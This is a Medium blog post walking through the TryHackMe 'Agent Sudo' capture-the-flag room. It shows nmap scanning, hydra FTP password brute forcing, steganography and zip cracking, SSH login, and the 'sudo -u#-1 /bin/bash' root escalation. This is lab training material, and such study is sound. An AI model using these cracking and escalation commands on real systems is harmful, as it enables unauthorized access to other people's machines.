TryHackMe Walkthrough | Agent Sudo

You found a secret server located under the deep sea. Your task is to hack inside the server and reveal the truth.

This walkthrough is written as a part of Master certificate in cybersecurity (Red Team) that I am pursuing from HackeU.

Reconnaissance

Starting with a nmap scan

nmap -sS -sV <ip>

We found that there are 3 ports open port 21, port 22, port80.

As port 80 is open we will check the webpage for any information.

Here we have a hint “codename as user-agent” and the codenames are single letters as we see in the above screenshot; Agent R.

Intercepting the traffic in burp and changing the user agent until we get a hit using intruder.

For the letter C we get a hit.

Using this as a user agent .

Here we get a username chris

Using hydra to crack the password for chris

hydra -l chris -P /usr/share/wordlists/rockyou.txt <IP> ftp 21

Successfully logged in the system.

Downloading the files to the host system and inspecting it

get <filename>

Checking To_agentJ.txt and we see that the password is stored in the pictures.

Using binwalk

binwalk cutie.png -e

Found 4 files

Cracking .zip file using zip2john

zip2john 8702.zip >test.txt

cracking the hash in test.txt using john and found password to open zip file.

Extracting 8702.zip using 7z

7z e 8702.zip

cat To_agentR.txt

Used cyberchef to crack the hint.

Used steghide to extract hidden message

steghide extract -sf cute-alien.jpg

Found password for agent James

Using the above information for logging into SSH port with user James and found password

ssh james@<targetip>

User_flag.txt

Checking for privileges

sudo -l

Got root access

sudo -u#-1 /bin/bash

root.txt

Thanks for reading.

--

--

--

B.Sc IT Graduate with C.E.H certification currently pursuing Offensive Security (Red Team). Passion for MMA and Kick-boxing & Automobile Enthusiast.

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Sharepoint Website Information disclosure and came make it to RCE(unfortunately i couldn’t)

How to Swap COS BEP-2 to COS BEP-20

Dawn of Money Markets

The Internet of Snitches

Incentive: Elemental Assasins Lottery

Dread Pirate Roberts: A Lesson in Anonymity

{UPDATE} ピクセル レーサー カーズ 3D Hack Free Resources Generator

How NEAR Works — The Basics

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Aditya Kumar

Aditya Kumar

B.Sc IT Graduate with C.E.H certification currently pursuing Offensive Security (Red Team). Passion for MMA and Kick-boxing & Automobile Enthusiast.

More from Medium

DHCP Writeup | TRYHACKME

HTB Previse writeup

HTB-Beep Writeup

How to find switched in Nmap…